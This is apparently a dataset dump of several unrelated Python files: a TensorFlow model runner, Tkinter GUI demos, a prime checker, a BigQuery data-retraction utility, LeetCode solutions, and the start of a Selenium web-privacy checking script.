train_streaming_accuracy = self.session.run(\n tensors, feed_dict=feed_dict)\n\n self.train_summary_writer.add_summary(training_summary, i)\n\n print(\"Training at the end of iteration %i (epoch %i):\\tAccuracy:\\t%f\\tStreaming Accu:\\t%f\\tloss:\\t%f\" % (\n i, epoch, training_accuracy, train_streaming_accuracy, train_loss))\n self.train_summary_writer.flush()\n\n if label_batch is not None:\n return train_streaming_accuracy, train_auc[0]\n else:\n return train_streaming_accuracy, 0\n\n def load_checkpoint(self, path):\n self.saver = tf.train.import_meta_graph('%s.meta' % path)\n self.saver.restore(self.session, path)\n print(\"Checkpoint loaded from %s\" % path)\n\n def validate_once(self, i, input_batch, label_batch, reg_label_batch):\n feed_dict = {self.network.keep_prob: 1,\n self.network.is_training: False,\n self.network.input_features_placeholder: input_batch}\n\n if label_batch is not None:\n feed_dict.update({self.network.input_label_placeholder: label_batch})\n\n if reg_label_batch is not None:\n feed_dict.update({self.network.reg_input_placeholder: reg_label_batch})\n\n validation_summary, validation_accuracy, validation_streaming_accuracy, validation_loss = self.session.run(\n [self.valid_summaries_merged, self.valid_accuracy, self.valid_str_accu, self.valid_loss],\n feed_dict=feed_dict)\n\n val_auc = -1\n if label_batch is not None:\n val_auc = self.session.run([self.valid_auc], feed_dict=feed_dict)\n val_auc = val_auc[0][1]\n\n self.valid_summary_writer.add_summary(validation_summary, i)\n\n print(\"\\n\\n\" + \"*\" * 80)\n print(\"Validation after iteration %i:\\tAccuracy:\\t%f\\tStreaming Accu:\\t%f\\tloss:\\t%f\\tAUC:\\t%f\" % (\n i, validation_accuracy, validation_streaming_accuracy, validation_loss, val_auc))\n print(\"*\" * 80 + \"\\n\\n\")\n self.valid_summary_writer.flush()\n return val_auc, validation_loss\n\n def test_once(self, input_batch, label_batch, reg_label_batch):\n\n feed_dict = {self.network.keep_prob: 1,\n self.network.is_training: False,\n self.network.input_features_placeholder: input_batch}\n\n if label_batch is not None:\n feed_dict.update({self.network.input_label_placeholder: label_batch})\n\n if reg_label_batch is not None:\n feed_dict.update({self.network.reg_input_placeholder: reg_label_batch})\n\n test_summary, test_loss, test_predictions, test_accuracy = self.session.run(\n [self.test_summaries_merged, self.test_loss, self.test_predictions, self.test_accuracy],\n feed_dict=feed_dict)\n\n self.test_summary_writer.add_summary(test_summary, 1)\n\n print(\"\\n\\n\" + \"*\" * 80)\n print(\"Test accuracy at the end:\\t%f\\tloss:\\t%f\" % (\n test_accuracy, test_loss))\n print(\"*\" * 80 + \"\\n\\n\")\n self.test_summary_writer.flush()\n\n np.savetxt(self.test_pred_path, test_predictions, '%.7f')\n print(\"Test predictions/scores saved in %s \" % self.test_pred_path)\n\n def start_tensorboard(self):\n log_dir_abs_path = os.path.abspath(self.log_folder)\n print(\"tensorboard --logdir=%s\\n\" % (log_dir_abs_path))\n # Popen([\"tensorboard\", \"--logdir=%s\" %(log_dir_abs_path)])\n # print(\"\\n\")\n\n utils.background_process([\"tensorboard\", \"--logdir=%s\" % (log_dir_abs_path)])\n\n def split_to_batches(self, input, batch_size):\n np.random.shuffle(input)\n\n length = input.shape[0]\n remainder = length % batch_size\n number_of_batches = length // batch_size\n batches = []\n if number_of_batches != 0:\n batches = np.array_split(input[:length - remainder], number_of_batches)\n if remainder != 0:\n batches += [input[-remainder:]]\n return batches\n\n 
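# Example with hypothetical sizes: 10 rows and batch_size=3 give remainder 1, so\n    # np.array_split turns the first 9 rows into three 3-row batches and the last\n    # row is appended as a fourth, smaller batch -- no row is dropped.\n    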
def create_stratifier(self, input, batch_size):\n label_batch = None\n\n if self.network.ground_truth_slicer:\n label_batch = input[:, self.network.ground_truth_slicer]\n\n return StratifiedShuffle(input, label_batch, batch_size)\n\n def split_to_batches_stratified(self, input, stratifier):\n for batch_idx in stratifier.split():\n yield input[batch_idx]\n\n def save_model(self, iteration):\n\n experiment_ID = \"L%s_H%s_L1%s_L2%s2_B%s_LR%s\" % (\n self.network.num_layers, self.network.num_hidden_units, self.network.l1_reg, self.network.l2_reg,\n self.batch_size, self.network.learning_rate) # empty means auto name\n path = \"%s/%s_train\" % (self.checkpoint_path, experiment_ID)\n self.saver.save(self.session, path, iteration)\n\n def run_training_dataframe(self, train_df, validate_df):\n\n self.newest_checkpoint_path = \"\"\n self.last_train_iteration = 0\n\n print(\"\\n\")\n val_acc = []\n avg_validation_acc = []\n val_loss = []\n avg_validation_loss = []\n v_count = 0\n # validation_window = params['validation_window']\n\n train_values = train_df.values\n train_stream_acc = 0\n\n label_batch = None\n reg_label_batch = None\n\n stratifier = self.create_stratifier(train_values, self.batch_size)\n\n j = 1\n for i in range(1, self.num_epochs + 1):\n train_auc_vector = []\n\n if hasattr(self.network, 'stratified') and self.network.stratified:\n batches = self.split_to_batches_stratified(train_values, stratifier)\n else:\n batches = self.split_to_batches(train_values, self.batch_size)\n\n for batch in batches:\n train_stream_acc, train_auc = self.apply_batch(batch, i, j)\n train_auc_vector.append(train_auc)\n j += 1\n\n train_auc = np.mean(train_auc_vector)\n\n if i % self.checkpoint_every == 0:\n self.save_model(i)\n\n if i % self.validation_interval == 0:\n\n input_batch = validate_df.iloc[:, self.network.input_features_slicer]\n\n if self.network.ground_truth_slicer:\n label_batch = validate_df.iloc[:, self.network.ground_truth_slicer]\n\n if self.network.reg_ground_truth_slicer:\n reg_label_batch = validate_df.iloc[:, self.network.reg_ground_truth_slicer]\n\n accuracy, loss = self.validate_once(i, input_batch, label_batch, reg_label_batch)\n val_acc.append(accuracy)\n val_loss.append(loss)\n v_count += 1\n if v_count > self.validation_window:\n Validation_Acc = np.mean(val_acc[-self.validation_window:])\n avg_validation_acc.append(Validation_Acc)\n avg_validation_loss.append(np.mean(val_loss[-self.validation_window:]))\n else:\n Validation_Acc = np.mean(val_acc)\n avg_validation_acc.append(Validation_Acc)\n avg_validation_loss.append(np.mean(val_loss))\n\n if i > 0 and i % (self.validation_interval * self.val_check_after) == 0:\n older_half_loss_mean = np.mean(avg_validation_loss[:len(avg_validation_loss) // 2])\n newer_half_loss_mean = np.mean(avg_validation_loss[len(avg_validation_loss) // 2:])\n # if older_half_loss_mean < 0.95 * newer_half_loss_mean:\n if older_half_loss_mean < (newer_half_loss_mean + 1e-4):\n print(older_half_loss_mean)\n print(newer_half_loss_mean)\n print(j)\n print(\"_\" * 50)\n break\n else:\n avg_validation_acc = []\n avg_validation_loss = []\n\n # if j % self.val_check_after == 0:\n # if np.mean(avg_validation_acc[:len(avg_validation_acc) // 2]) < np.mean(avg_validation_acc[len(avg_validation_acc) // 2:]):\n # print(np.mean(avg_validation_acc[:len(avg_validation_acc) // 2]))\n # print(np.mean(avg_validation_acc[len(avg_validation_acc) // 2:]))\n # print(self.num_epochs)\n # print(\"_\"*50)\n # break\n # else:\n # avg_validation_acc = []\n return Validation_Acc, 
train_stream_acc, train_auc, loss\n\n    def apply_batch(self, batch, i, j):\n\n        input_batch = batch[:, self.network.input_features_slicer]\n        label_batch = None\n        reg_label_batch = None\n\n        if self.network.ground_truth_slicer:\n            label_batch = batch[:, self.network.ground_truth_slicer]\n\n        if self.network.reg_ground_truth_slicer:\n            reg_label_batch = batch[:, self.network.reg_ground_truth_slicer]\n\n        train_streaming_accu, train_auc = self.train_once_dataframe(i, j, input_batch, label_batch, reg_label_batch)\n        self.last_train_iteration = j\n        return train_streaming_accu, train_auc\n\n    def run_test(self, test_df):\n        print(\"TESTING\")\n        label_batch = None\n        reg_label_batch = None\n\n        input_batch = test_df.iloc[:, self.network.input_features_slicer]\n        if self.network.ground_truth_slicer:\n            label_batch = test_df.iloc[:, self.network.ground_truth_slicer]\n\n        if self.network.reg_ground_truth_slicer:\n            reg_label_batch = test_df.iloc[:, self.network.reg_ground_truth_slicer]\n\n        self.test_once(input_batch, label_batch, reg_label_batch)\n","sub_path":"mlp/fcn_runner.py","file_name":"fcn_runner.py","file_ext":"py","file_size_in_byte":17925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"482949423","text":"import tkinter as tk\n\nclass AlertDialog:\n\n    def __init__(self):\n        self.invalidDiag = tk.Toplevel()\n        invalidInput = tk.Label(master=self.invalidDiag,\n                                text='Error: Invalid Input').grid(row=1,column=1)\n        closeButton = tk.Button(master=self.invalidDiag,\n                                text='Close',\n                                command=self.invalidDiag.destroy).grid(row=2,column=1)\n    def start(self):\n        #self.invalidDiag.grab_set() #takes control over the dialog (makes it active)\n        self.invalidDiag.wait_window()\n\nclass QuitButtonDialog():\n    def __init__(self):\n        self.quitMaster = tk.Toplevel()\n        dialog = tk.Label(master = self.quitMaster, text=\"Continue to quit the program?\").grid(row=1)\n\n    def start(self):\n        #self.quitMaster.grab_set() #takes control over the dialog (makes it active)\n        self.quitMaster.wait_window()\n\n\nclass TimeConverter:\n    def __init__(self):\n        self.mainWindow = tk.Tk()\n        self.mainWindow.title(\"Seconds Converter\")\n        self.results = tk.StringVar()\n        self.inputSecs = tk.StringVar()\n        secLabel = tk.Label(master=self.mainWindow,\n                            text=\"Seconds:\").grid(row=0,sticky=\"W\")\n        resultLabel = tk.Label(master=self.mainWindow,\n                               text=\"Converted Time:\\n(H:M:S)\").grid(row=1,sticky=\"W\")\n        calcResults = tk.Label(master=self.mainWindow,\n                               background='light gray',width=20,\n                               textvariable = self.results,\n                               anchor='w').grid(row=1, column=1)\n        secEntry = tk.Entry(master=self.mainWindow,\n                            width=24,\n                            textvariable = self.inputSecs).grid(row=0, column=1)\n\n        calcButton = tk.Button(master=self.mainWindow,\n                               text='Calculate',\n                               command=self.SecondsToHours).grid(row=2,\n                               column=0,sticky=\"w\")\n        # Pass the method itself as the callback; calling it here would open the\n        # quit dialog at startup and bind None to the button.\n        quitButton = tk.Button(master=self.mainWindow,\n                               text='Quit',\n                               command=self.showQuitDialog).grid(row=2,column=1,sticky=\"E\")\n\n    def invalidInputEntered(self):\n        errorDiag = AlertDialog()\n        errorDiag.start()\n\n    def showQuitDialog(self):\n        quitdialog = QuitButtonDialog()\n        quitdialog.start()\n\n    def startDisplay(self) -> None:\n        self.mainWindow.mainloop()\n\n    def SecondsToHours(self):\n        try:\n            inputseconds = int(self.inputSecs.get())\n            seconds = int(inputseconds%60)\n            minutes = int(((inputseconds - seconds)/60)%60)\n            hours = int((((inputseconds - seconds)/60)- minutes)/60)\n            tempResults = str(hours) + ':' + str(minutes) + ':' + str(seconds)\n            self.results.set(tempResults)\n            return\n        
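# Non-numeric input makes int() raise ValueError; fall through to the error dialog below.\n        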
except ValueError:\n            end = self.invalidInputEntered()\n\nif __name__ == '__main__':\n    TimeConverter().startDisplay()\n","sub_path":"lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"586877038","text":"x=0\na=int(input(\"Enter a number\"))\nwhile a>0:\n    x+=1\n    print(x)\n    # Trial division: x is prime iff x > 1 and no d in [2, sqrt(x)] divides x\n    is_prime = x>1\n    for d in range(2, int(x**0.5)+1):\n        if x%d==0:\n            is_prime = False\n            break\n    if is_prime:\n        print(\"YES, it is a prime number\")\n    else:\n        print(\"NO\")\n    if x==a:\n        break","sub_path":"primosB.py","file_name":"primosB.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"109717283","text":"#!C:\\Python34\\python.exe\n#!/Python34/python\n#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n\"\"\"\n    Python GUI using grid method\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\n\nimport os\nimport time\nimport tkinter as tk  # import module tkinter, reference it as tk\n\n##-----------------------------------------------------------------------------\nclass Application( tk.Frame ):\n    def __init__(self, master=None):\n        tk.Frame.__init__(self, master)\n        self.grid()\n        self.CreateWidgets()\n\n    def CreateWidgets (self):\n        # ----- Button -----\n        #self.quitButton = tk.Button(self, text='Quit', command=self.quit)\n        self.quitButton = tk.Button(self, text='Quit', command=self.destroy)\n        self.quitButton.grid(row=0, column=0)\n\n        # ----- Menubutton -----\n        self.BtnMenu = tk.Menubutton(self, text='Menu Button', bg=\"gray\", relief='raised')\n        self.BtnMenu.grid()\n\n        # ----- OptionMenu -----\n        optionList = ( 'train', 'plane', 'boat' )\n        self.val = tk.StringVar()\n        self.val.set( optionList[0] )\n        self.opmu = tk.OptionMenu( self, self.val, *optionList )\n        self.opmu.grid()\n\n        from tkinter import ttk\n        self.opmu2 = ttk.OptionMenu( self, self.val, *optionList )\n        #self.opmu2.grid()\n\n\n##-----------------------------------------------------------------------------\n\"\"\"\ndef main():\n#    This is the main function\n#    range(start, stop[, step])\n    for i in range(0, 1000, 20):\n        print(\"Current Num : %d\" % i)\n        time.sleep(1)\n\"\"\"\nif __name__ == \"__main__\":\n    #main()\n    #msg = main()\n    #print(msg)\n    #mainloop()\n\n    app = Application()\n    app.master.title('widget OptionMenu')\n    app.mainloop()\n\n\n##-----------------------------------------------------------------------------\n\"\"\"\nResource:\n    - http://www.tkdocs.com/tutorial/windows.html#dialogs\n\n\"\"\"\n\n##-----------------------------------------------------------------------------\n## tkinter Widgets:\n\"\"\"\n    - Button\n    - Canvas\n    - Checkbutton\n    - Entry\n    - Frame\n    - Label\n    - LabelFrame\n    - Listbox\n    - Menubutton\n    - Menu\n    - Message\n    - messagebox (v2.x -> tkMessageBox)\n    - OptionMenu\n    - PanedWindow\n    - Radiobutton\n    - Scale\n    - Scrollbar\n    - Spinbox\n    - Text\n    - Toplevel\n#------------------------------------------------------------------------------\n\"\"\"\n","sub_path":"tkinter/tkinter_grid/OptionMenu.py","file_name":"OptionMenu.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"251026426","text":"# Python imports\nimport os\nimport re\nimport argparse\nimport logging\n\n# Project imports\nimport common\nfrom utils import bq\nfrom constants.retraction import retract_utils as consts\nfrom constants.utils import bq as bq_consts\n\nLOGGER = logging.getLogger(__name__)\n\nUNIONED_REGEX = 
re.compile(r'unioned_ehr_?\\d{6}')\nCOMBINED_REGEX = re.compile(r'combined\\d{6}')\nDEID_REGEX = re.compile(r'.*deid.*')\nEHR_REGEX = re.compile(r'ehr_?\\d{6}')\nRELEASE_REGEX = re.compile(r'R\\d{4}Q\\dR\\d')\nRELEASE_TAG_REGEX = re.compile(r'\\d{4}[qQ]\\d[rR]\\d')\nSANDBOX_REGEX = re.compile(r'.*sandbox.*')\nSTAGING_REGEX = re.compile(r'.*staging.*')\nVOCABULARY_REGEX = re.compile(r'vocabulary.*')\nVALIDATION_REGEX = re.compile(r'validation.*')\n\n\ndef get_table_id(table):\n \"\"\"\n Returns id column of the cdm table\n\n :param table: cdm table name\n :return: id column name for the table\n \"\"\"\n return table + '_id'\n\n\ndef get_tables(table_df):\n \"\"\"\n returns all tables in dataset using information_schema.columns dataframe\n\n :param table_df: dataframe from information_schema.columns\n :return: list containing all tables in dataset\n \"\"\"\n tables = table_df.get(bq_consts.TABLE_NAME).to_list()\n return tables\n\n\ndef get_pid_tables(table_df):\n \"\"\"\n returns tables containing person_id column in dataset using information_schema.columns dataframe\n\n :param table_df: dataframe from information_schema.columns\n :return: list containing tables with person_id in dataset\n \"\"\"\n tables_with_pid = table_df[table_df.get(bq_consts.COLUMN_NAME) ==\n consts.PERSON_ID].get(\n bq_consts.TABLE_NAME).to_list()\n return tables_with_pid\n\n\ndef get_mapping_type(tables):\n \"\"\"\n Returns whether mapping or ext tables exist within a dataset using list of tables as input\n\n :param tables: list of tables within the dataset\n :return: common.EXT or common.MAPPING\n \"\"\"\n mapping_tables = [\n table for table in tables if common.MAPPING_PREFIX in table\n ]\n ext_tables = [table for table in tables if common.EXT_SUFFIX in table]\n\n if len(mapping_tables) >= len(ext_tables):\n return common.MAPPING\n return common.EXT\n\n\ndef get_src_id(mapping_type):\n \"\"\"\n Returns source id column name for mapping or ext tables\n\n :param mapping_type: common.MAPPING or common.EXT\n :return: src_id or src_hpo_id\n \"\"\"\n src_id = 'src_id'\n if mapping_type == common.MAPPING:\n src_id = 'src_hpo_id'\n return src_id\n\n\ndef get_datasets_list(project_id, dataset_ids_list):\n \"\"\"\n Returns list of dataset_ids on which to perform retraction\n\n Returns list of rdr, ehr, unioned, combined and deid dataset_ids and excludes sandbox and staging datasets\n :param project_id: identifies the project containing datasets to retract from\n :param dataset_ids_list: string of datasets to retract from separated by a space. If set to 'all_datasets',\n retracts from all datasets. If set to 'none', skips retraction from BigQuery datasets\n :return: List of dataset_ids\n :raises: AttributeError if dataset_ids_str does not allow .split()\n \"\"\"\n client = bq.get_client(project_id)\n all_dataset_ids = [\n dataset.dataset_id for dataset in list(client.list_datasets(project_id))\n ]\n\n if not dataset_ids_list or dataset_ids_list == [consts.NONE]:\n dataset_ids = []\n LOGGER.info(\n \"No datasets specified. Defaulting to empty list. Expect bucket only retraction.\"\n )\n elif dataset_ids_list == [consts.ALL_DATASETS]:\n dataset_ids = all_dataset_ids\n LOGGER.info(\n f\"All datasets are specified. 
Setting dataset_ids to all datasets in project: {project_id}\"\n )\n else:\n # only consider datasets that exist in the project\n dataset_ids = [\n dataset_id for dataset_id in dataset_ids_list\n if dataset_id in all_dataset_ids\n ]\n LOGGER.info(\n f\"Datasets specified and existing in project {project_id}: {dataset_ids}\"\n )\n\n # consider datasets containing PPI/EHR data, excluding sandbox/staging datasets\n dataset_ids = [\n dataset_id for dataset_id in dataset_ids\n if get_dataset_type(dataset_id) != common.OTHER and\n not is_sandbox_dataset(dataset_id)\n ]\n\n LOGGER.info(f\"Found datasets to retract from: {', '.join(dataset_ids)}\")\n return dataset_ids\n\n\ndef is_deid_label_or_id(client, project_id, dataset_id):\n \"\"\"\n Validates if a dataset is labeled deid or contains deid in the dataset_id\n\n :param client: BigQuery client\n :param project_id: project containing the dataset\n :param dataset_id: dataset to identify\n :return: Boolean indicating if a dataset is a deid dataset\n \"\"\"\n label = _is_labeled_deid(client, project_id, dataset_id)\n if label is None:\n return is_deid_dataset(dataset_id)\n return label\n\n\ndef _is_labeled_deid(client, project_id, dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a deid dataset using the label 'de_identified'\n\n :param client: BigQuery client object\n :param project_id: Identifies the project\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is labeled a deid dataset or None if unlabeled\n \"\"\"\n # when called by is_deid_label_or_id, return None so name can be checked.\n if not client:\n LOGGER.debug(\"Client not available. Labels can't be checked.\")\n return None\n\n dataset = client.get_dataset(f'{project_id}.{dataset_id}')\n if dataset.labels and consts.DE_IDENTIFIED in dataset.labels:\n return dataset.labels[consts.DE_IDENTIFIED] == consts.TRUE\n return None\n\n\ndef is_deid_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a deid dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a deid dataset\n \"\"\"\n return bool(re.match(DEID_REGEX, dataset_id)) or bool(\n re.match(RELEASE_REGEX, dataset_id))\n\n\ndef is_combined_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a combined dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a combined dataset\n \"\"\"\n if is_deid_dataset(dataset_id):\n return False\n return bool(re.match(COMBINED_REGEX, dataset_id))\n\n\ndef is_unioned_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a unioned dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a unioned dataset\n \"\"\"\n return bool(re.match(UNIONED_REGEX, dataset_id))\n\n\ndef is_ehr_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is an ehr dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is an ehr dataset\n \"\"\"\n return bool(re.match(\n EHR_REGEX,\n dataset_id)) or dataset_id == os.environ.get('BIGQUERY_DATASET_ID')\n\n\ndef is_sandbox_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a sandbox dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a sandbox dataset\n \"\"\"\n return bool(re.match(SANDBOX_REGEX, 
dataset_id))\n\n\ndef is_staging_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a staging dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a staging dataset\n \"\"\"\n return bool(re.match(STAGING_REGEX, dataset_id))\n\n\ndef get_dataset_type(dataset_id):\n if common.COMBINED in dataset_id and common.DEID not in dataset_id:\n return common.COMBINED\n if common.UNIONED_EHR in dataset_id:\n return common.UNIONED_EHR\n if common.RDR in dataset_id:\n return common.RDR\n if common.EHR in dataset_id and common.UNIONED_EHR not in dataset_id:\n return common.EHR\n if common.DEID in dataset_id or is_deid_dataset(dataset_id):\n return common.DEID\n return common.OTHER\n\n\ndef get_pid_list_to_sql_expr(pid_source):\n \"\"\"\n Converts list of ints into BQ compatible string of the form '(int_1, int_2, ...)'\n\n :param pid_source: list of pids to consider as ints\n :return: BQ compatible string of ints\n \"\"\"\n return str(tuple(pid_source))\n\n\ndef get_pid_table_to_sql_expr(pid_source, pid):\n \"\"\"\n Converts pid table string into BQ statement selecting pids from input table\n\n :param pid: person_id or research_id\n :param pid_source: string of the form 'project.dataset.table' where table contains pids to consider\n :return: BQ statement selecting pids\n \"\"\"\n return consts.PID_QUERY.format(pid=pid, pid_source=pid_source)\n\n\ndef get_mapping_tables(mapping_type, tables):\n \"\"\"\n returns mapping tables in dataset using mapping type and list of tables in the dataset\n\n :param mapping_type: common.EXT or common.MAPPING\n :param tables: list of tables in dataset\n :return: list of mapping tables (or ext tables)\n \"\"\"\n if mapping_type == common.MAPPING:\n mapping_tables = [\n table for table in tables if common.MAPPING_PREFIX in table\n ]\n return mapping_tables\n mapping_tables = [table for table in tables if common.EXT_SUFFIX in table]\n return mapping_tables\n\n\ndef get_cdm_table(mapping_ext_table):\n if common.MAPPING_PREFIX in mapping_ext_table:\n return mapping_ext_table.replace(common.MAPPING_PREFIX, '')\n return mapping_ext_table.replace(common.EXT_SUFFIX, '')\n\n\ndef get_cdm_and_mapping_tables(mapping_tables, tables_with_pid):\n \"\"\"\n Returns dict containing cdm tables and corresponding mapping tables as key value pairs\n\n :param mapping_tables: list of mapping tables in dataset\n :param tables_with_pid: list of tables containing person_id\n :return: dict containing cdm_table, mapping_table as key, value pairs\n \"\"\"\n # filters tables which do not exist, also ensures table is valid cdm_table\n cdm_and_mapping_tables = dict((get_cdm_table(table), table)\n for table in mapping_tables\n if get_cdm_table(table) in tables_with_pid)\n return cdm_and_mapping_tables\n\n\ndef get_pid_sql_expr(pid_source, pid=consts.PERSON_ID):\n \"\"\"\n Converts a list of integer pids into a bq-compatible sql expression containing the pids as values\n or a string of the form 'project.dataset.table' into a SELECT query that selects pids from the table\n\n :param pid_source: can be a list of pids or string of the form 'project.dataset.table', where table contains pids\n :param pid: person_id or research_id, required for table sql expr, 'person_id' by default\n :return: bq-compatible string expression of pids or SELECT query that selects pids from table\n :raises ValueError if pid_source type is incorrect or pid_table string is not specified correctly\n \"\"\"\n if type(pid_source) == list:\n return 
get_pid_list_to_sql_expr(pid_source)\n if type(pid_source) == str and pid_source.count('.') == 2:\n return get_pid_table_to_sql_expr(pid_source, pid)\n raise ValueError(\n 'Please specify pid_table parameters as \"project.dataset.table\"')\n\n\ndef get_dataset_ids_to_target(project_id, dataset_ids=None):\n \"\"\"\n Return dataset_ids that are found in the project based on BQ metadata\n\n :param project_id: Identifies the project to target\n :param dataset_ids: list identifying datasets or None for all datasets\n :return: List of dataset_ids in the project to target\n \"\"\"\n client = bq.get_client(project_id)\n all_datasets = list(client.list_datasets(project_id))\n all_dataset_ids = [dataset.dataset_id for dataset in all_datasets]\n result_dataset_ids = []\n if dataset_ids is None:\n result_dataset_ids = all_dataset_ids\n else:\n for dataset_id in dataset_ids:\n if dataset_id not in all_dataset_ids:\n LOGGER.info(\n f\"Dataset {dataset_id} not found in project {project_id}, skipping\"\n )\n else:\n result_dataset_ids.append(dataset_id)\n return result_dataset_ids\n\n\ndef check_dataset_ids_for_sentinel(dataset_ids):\n \"\"\"\n Checks if sentinel value \"all_datasets\" is the only value in the list dataset_ids\n If so, returns None. If not, raises error if \"all_datasets\" is in the list of dataset_ids\n\n :param dataset_ids: list of dataset_ids\n :return: dataset_ids: list of dataset_ids\n :raises ValueError\n \"\"\"\n if len(dataset_ids) == 1 and dataset_ids[0] == consts.ALL_DATASETS:\n return None\n for dataset_id in dataset_ids:\n if dataset_id == consts.ALL_DATASETS:\n raise ValueError(\n \"Please enter 'all_datasets' to target all datasets \"\n \"or specific datasets without using 'all_datasets'\")\n return dataset_ids\n\n\ndef fetch_parser():\n parser = argparse.ArgumentParser(\n description='Estimates the prevalence of specified pids in the project',\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-p',\n '--project_id',\n action='store',\n dest='project_id',\n help='Identifies the project to retract data from',\n required=True)\n parser.add_argument('-d',\n '--dataset_ids',\n action='store',\n nargs='+',\n dest='dataset_ids',\n help='Identifies datasets to target. 
Set to '\n                             '-d all_datasets to target all datasets in project '\n                             'or specific datasets as -d dataset_1 dataset_2 etc.',\n                        required=True)\n    parser.add_argument('-o',\n                        '--hpo_id',\n                        action='store',\n                        dest='hpo_id',\n                        help='Identifies the site submitting the person_ids, '\n                        'can be \"none\" if not targeting ehr datasets',\n                        required=True)\n    pid_source_group = parser.add_mutually_exclusive_group(required=True)\n\n    pid_source_group.add_argument(\n        '-l',\n        '--pid_list',\n        dest='pid_source',\n        nargs='+',\n        type=int,\n        help='person/research ids to consider separated by spaces')\n    pid_source_group.add_argument(\n        '-t',\n        '--pid_table',\n        dest='pid_source',\n        help='Specify table as \"project.dataset.table\"')\n    return parser\n","sub_path":"data_steward/retraction/retract_utils.py","file_name":"retract_utils.py","file_ext":"py","file_size_in_byte":14774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"554777358","text":"# class Solution:\r\n#     def buildArray(self, target: [int], n: int) :\r\n#         stack=[]\r\n#         lists=[_ for _ in range(1,n+1)]\r\n#         res=[]\r\n#         i=0\r\n#         while stack!=target:\r\n#             top=lists.pop(0)\r\n#             stack.append(top)\r\n#             res.append('push')\r\n#             if stack[-1]==target[i]:\r\n#                 i+=1\r\n#             else:\r\n#                 stack.pop()\r\n#                 res.append('pop')\r\n#         return res\r\n#\r\n# a=Solution()\r\n# print(a.buildArray(target=[1,3],n=3))\r\n\r\n# class Solution:\r\n#     def countTriplets(self, arr: [int]) -> int:\r\n#         n=len(arr)\r\n#         res=0\r\n#         for i in range(n-1):\r\n#             for j in range(i+1,n):\r\n#                 a=0  # XOR with 0 leaves the other operand unchanged\r\n#                 for i1 in range(i,j):\r\n#                     a=arr[i1]^a\r\n#                 b=0\r\n#                 for j1 in range(j,n):\r\n#                     b=arr[j1]^b\r\n#                 if b==a:\r\n#                     res+=1\r\n#         return res\r\n# Problem 1443\r\n# Method 1: depth-first search\r\nimport collections\r\nclass Solution:\r\n    def minTime(self, n: int, edges: [[int]], hasApple: [bool]) -> int:\r\n        build_tree=collections.defaultdict(list)  # adjacency list of the tree\r\n        for i,j in edges:\r\n            build_tree[i].append(j)\r\n        def dfs(root):\r\n            ret=0\r\n            if root in build_tree:\r\n                for child in build_tree[root]:\r\n                    tmp=dfs(child)  # cost collected below this child\r\n                    if hasApple[child]==True or tmp!=0:  # if this child holds an apple, or any of its descendants does, the edge to it must be walked\r\n                        ret+=2\r\n                        ret+=tmp\r\n            return ret\r\n        return dfs(0)\r\na=Solution()\r\nprint(a.minTime(n = 7, edges = [[0,1],[0,2],[1,4],[1,5],[2,3],[2,6]], hasApple = [False,False,True,False,True,True,False]))\r\n\r\n# Method 2: store every edge on the path from the root to each apple node in a set (the set deduplicates shared edges), then return 2 * the number of edges\r\nclass Solution:\r\n    def minTime(self, n: int, edges: [[int]], hasApple: [bool]) -> int:\r\n        apple_tree={}\r\n        for i in edges:\r\n            apple_tree[i[1]]=i[0]\r\n        res=set()  # set of (parent, child) path edges\r\n        for j in range(len(hasApple)):\r\n            if hasApple[j]:\r\n                heads=j\r\n                while heads!=0:  # while the current node has not reached the root\r\n                    res.add((apple_tree[heads],heads))\r\n                    heads=apple_tree[heads]  # step up to the parent\r\n        return len(res)*2\r\n\r\n\r\n","sub_path":"周赛/188周赛.py","file_name":"188周赛.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"184238490","text":"import os\nimport re\n\nimport resultFilename\nimport urlChecker\nimport verifFile\n\nimport selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nwebprivacycheckURL = \"https://webprivacycheck.plehn-media.de/en\"\n\nurlRegex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)\" \\
